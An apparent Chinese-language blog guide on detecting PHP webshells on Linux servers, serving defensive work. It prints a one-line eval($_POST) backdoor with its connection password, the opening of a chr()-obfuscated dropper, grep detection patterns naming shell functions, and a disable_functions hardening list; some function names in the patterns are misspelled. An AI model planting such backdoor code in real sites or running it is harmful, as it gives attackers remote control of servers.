linux查找webshell

linux查找webshell

 

首先认识一下小马，一般大马容易暴露，骇客都会留一手，把小马加入正常PHP文件里面

 

<?php eval ($_POST[a]);?> //密码为a,使用中国菜刀连接

 

隐藏很深的小马

 

fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).

。。。省略

 

解码：

其中chr括号里面的数字是美国信息交换标准代码,缩写：ASCII 可以找一份对照表对应一下

 

比如 46  就是 .

       47  就是 /

       32  就是 空格

 

也可以echo chr(46)解出来

<?php

echo chr(46).chr(47).chr(97).chr(46)

?>

 

WINDOWS下的应该有很多日志分析和查杀工具（很少用WIN表示不能举例），那么，LINUX下如何查找WEBSHELL呢？

 

 

1

find /www/ -name "*.php" |xargs egrep 'assert|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\]\(\$\_\POST\[|eval\(str_rot13'>/opt/www.log &

然后就手工查看，写入计划任务啦。

只查小马的可以

 

 

1

grep -r --include=*.php  '[^a-z]eval($_POST' . > post.txt

2

grep -r --include=*.php  '[^a-z]eval($_REQUEST' . > REQUEST.txt

查出来了，重要的是要分析日志，查看入侵源头。

防范：

 

禁用危险函数，整理权限，防止权限过大

 

 

1

disable_functions = exec,scandir,shell_exec,phpinfo,eval,passthru,system,chroot,chgrp,chown,proc_open,proc_get_status,ini_alter,ini_restore,dl,openlog,syslog,readlink,s

2

ymlink,popepassthru,stream_socket_server,fsocket

 

git 下来  只需要2个文件

shelldetect.php   //默认帐号密码 admin protect 

shelldetect.db

 

如果你有什么好的建议，感谢你的分享：）

 

PS：shell反弹